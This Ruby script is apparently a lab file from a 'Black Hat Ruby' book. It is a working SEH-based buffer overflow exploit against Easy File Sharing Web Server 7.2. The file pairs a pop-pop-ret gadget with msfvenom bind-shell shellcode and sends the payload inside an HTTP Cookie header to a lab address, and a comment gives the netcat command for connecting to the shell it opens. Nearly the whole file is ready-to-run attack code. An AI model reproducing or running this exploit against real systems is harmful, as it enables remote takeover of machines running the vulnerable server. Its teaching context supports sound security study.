#!/usr/bin/env ruby
# -*- coding: binary -*-
# ========================================================= #
# This file is a part of { Black Hat Ruby } book lab files. #
# ========================================================= #
#
# Author:
#   Sabri Hassanyah | @KINGSABRI
# Description:
#   Easy File Sharing Web Server 7.2 - Exploit
# Requirements:
#
require 'socket'

buffer    = "A" * 4052               # 4056
nseh      = [0x90900aeb].pack('V')   # jump code right here
seh       = [0x100195f2].pack('V')   # pop pop ret @ 0x100195f2 : ImageLoad.dll
nops      = "\x90" * 20
# msfvenom -p windows/shell_bind_tcp EXITFUNC=process -f ruby --smallest -b "\x00"
# nc -nv 192.168.100.96 4444
shellcode = 
  "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09" +
  "\xb3\xc2\x62\x83\xeb\xfc\xe2\xf4\xf5\x5b\x40\x62\x09\xb3" +
  "\xa2\xeb\xec\x82\x02\x06\x82\xe3\xf2\xe9\x5b\xbf\x49\x30" +
  "\x1d\x38\xb0\x4a\x06\x04\x88\x44\x38\x4c\x6e\x5e\x68\xcf" +
  "\xc0\x4e\x29\x72\x0d\x6f\x08\x74\x20\x90\x5b\xe4\x49\x30" +
  "\x19\x38\x88\x5e\x82\xff\xd3\x1a\xea\xfb\xc3\xb3\x58\x38" +
  "\x9b\x42\x08\x60\x49\x2b\x11\x50\xf8\x2b\x82\x87\x49\x63" +
  "\xdf\x82\x3d\xce\xc8\x7c\xcf\x63\xce\x8b\x22\x17\xff\xb0" +
  "\xbf\x9a\x32\xce\xe6\x17\xed\xeb\x49\x3a\x2d\xb2\x11\x04" +
  "\x82\xbf\x89\xe9\x51\xaf\xc3\xb1\x82\xb7\x49\x63\xd9\x3a" +
  "\x86\x46\x2d\xe8\x99\x03\x50\xe9\x93\x9d\xe9\xec\x9d\x38" +
  "\x82\xa1\x29\xef\x54\xdb\xf1\x50\x09\xb3\xaa\x15\x7a\x81" +
  "\x9d\x36\x61\xff\xb5\x44\x0e\x4c\x17\xda\x99\xb2\xc2\x62" +
  "\x20\x77\x96\x32\x61\x9a\x42\x09\x09\x4c\x17\x08\x01\xea" +
  "\x92\x80\xf4\xf3\x92\x22\x59\xdb\x28\x6d\xd6\x53\x3d\xb7" +
  "\x9e\xdb\xc0\x62\x18\xef\x4b\x84\x63\xa3\x94\x35\x61\x71" +
  "\x19\x55\x6e\x4c\x17\x35\x61\x04\x2b\x5a\xf6\x4c\x17\x35" +
  "\x61\xc7\x2e\x59\xe8\x4c\x17\x35\x9e\xdb\xb7\x0c\x44\xd2" +
  "\x3d\xb7\x61\xd0\xaf\x06\x09\x3a\x21\x35\x5e\xe4\xf3\x94" +
  "\x63\xa1\x9b\x34\xeb\x4e\xa4\xa5\x4d\x97\xfe\x63\x08\x3e" +
  "\x86\x46\x19\x75\xc2\x26\x5d\xe3\x94\x34\x5f\xf5\x94\x2c" +
  "\x5f\xe5\x91\x34\x61\xca\x0e\x5d\x8f\x4c\x17\xeb\xe9\xfd" +
  "\x94\x24\xf6\x83\xaa\x6a\x8e\xae\xa2\x9d\xdc\x08\x32\xd7" +
  "\xab\xe5\xaa\xc4\x9c\x0e\x5f\x9d\xdc\x8f\xc4\x1e\x03\x33" +
  "\x39\x82\x7c\xb6\x79\x25\x1a\xc1\xad\x08\x09\xe0\x3d\xb7"
rest      = "Z" * (10000 - (buffer + nseh + seh + nops + shellcode).size)
exploit   = buffer + nseh + seh + nops + shellcode + rest 

puts "Sending exploit with #{exploit.size} buffer size."
request = "GET /vfolder.ghp HTTP/1.1\r\n"
request += "Cookie: SESSIONID=9999; UserID=PassWD=" + exploit + "\r\n\r\n"

# Start TCP Connection
s = TCPSocket.new('192.168.100.96', 80)
s.send(request, 0)
s.close


